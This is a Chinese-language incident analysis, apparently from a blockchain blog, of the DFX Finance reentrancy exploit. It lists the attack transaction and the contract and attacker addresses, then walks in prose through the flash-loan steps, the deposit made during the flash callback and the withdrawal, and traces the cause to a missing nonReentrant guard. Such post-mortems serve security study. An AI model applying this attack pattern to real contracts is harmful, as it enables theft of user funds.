{"content":{"title":"DFX Finance重入漏洞","body":"# 1.\tDFX Finance重入漏洞简介\r\nhttps://twitter.com/BlockSecTeam/status/1590960299246780417\r\n\r\n![1.png](https://img.learnblockchain.cn/attachments/2022/11/X5vY6RCw63845e042452a.png)\r\n# 2.\t相关地址或交易\r\n攻击交易：0x390def749b71f516d8bf4329a4cb07bb3568a3627c25e607556621182a17f1f9\r\n漏洞合约：\r\n0x46161158b1947d9149e066d6d31af1283b2d377c\r\n攻击合约：\r\n0x6cFa86a352339E766FF1cA119c8C40824f41F22D\r\n攻击地址：\r\n0x14c19962e4a899f29b3dd9ff52ebfb5e4cb9a067\r\n# 3.\t获利分析\r\nhttps://phalcon.blocksec.com/tx/eth/0x390def749b71f516d8bf4329a4cb07bb3568a3627c25e607556621182a17f1f9\r\n\r\n![2.png](https://img.learnblockchain.cn/attachments/2022/11/9RFD0DuL63845e431b04e.png)\r\n# 4.\t攻击过程&漏洞原因\r\n1.\t攻击者先调用DFX 合约0x78ac的方法viewDeposit() 查看获取200000.000000000000000000个流动性代币需要存储2325581395.325581个XIDR以及100000.000000个USDC；\r\n\r\n![3.png](https://img.learnblockchain.cn/attachments/2022/11/TUiLdSAa63845e6c5b607.png)\r\n2.\t攻击者再通过合约Uniswap V3: DAI-USDC 4闪电贷获取100,000 个 USDC，再通过Uniswap V3: USDC-XIDR闪电贷获取2,325,581,395.325581个XIDR，最后通过dfx-xidr-v2的闪电贷获取2,313,953,488.348954个XIDR、99,500个USDC。至此，资金准备已完成。\r\n\r\n![4.png](https://img.learnblockchain.cn/attachments/2022/11/GZBjitie63845e819800e.png)\r\n\r\n![5.png](https://img.learnblockchain.cn/attachments/2022/11/jBpwcqIF63845e8b31911.png)\r\n3.\t攻击者将贷款获得的资金通过方法deposit() 存入dfx-xidr-v2合约，共存入2,325,581,395.325581个XIDR、100,000个USDC，获取300,886.541899570004966586个dfx-xidr-usdc-v2 LPToken：\r\n\r\n![6.png](https://img.learnblockchain.cn/attachments/2022/11/rDqSfaIb63845e9f55ada.png)\r\n4.\t攻击者此时实际上已完成盗币，原因在于flash方法未使用防重入修饰符nonReentrant，导致攻击者可以先使用闪电贷获取资金，再存入贷款，绕过balance检查，且获得lptoken用于后续提款：\r\n\r\n![7.png](https://img.learnblockchain.cn/attachments/2022/11/ivgB7rfo63845ebd35e7e.png)\r\n\r\n![8.png](https://img.learnblockchain.cn/attachments/2022/11/jG7ZfU9a63845ec3d320a.png)\r\n5.\t攻击者直接调用withdraw() 提取USDC、XIDR代币，归还闪电贷，攻击完成\r\n\r\n![9.png](https://img.learnblockchain.cn/attachments/2022/11/Zb2EpuNb63845edd4b855.png)"},"author":{"user":"https://learnblockchain.cn/people/10579","address":null},"history":null,"timestamp":1669619479,"version":1}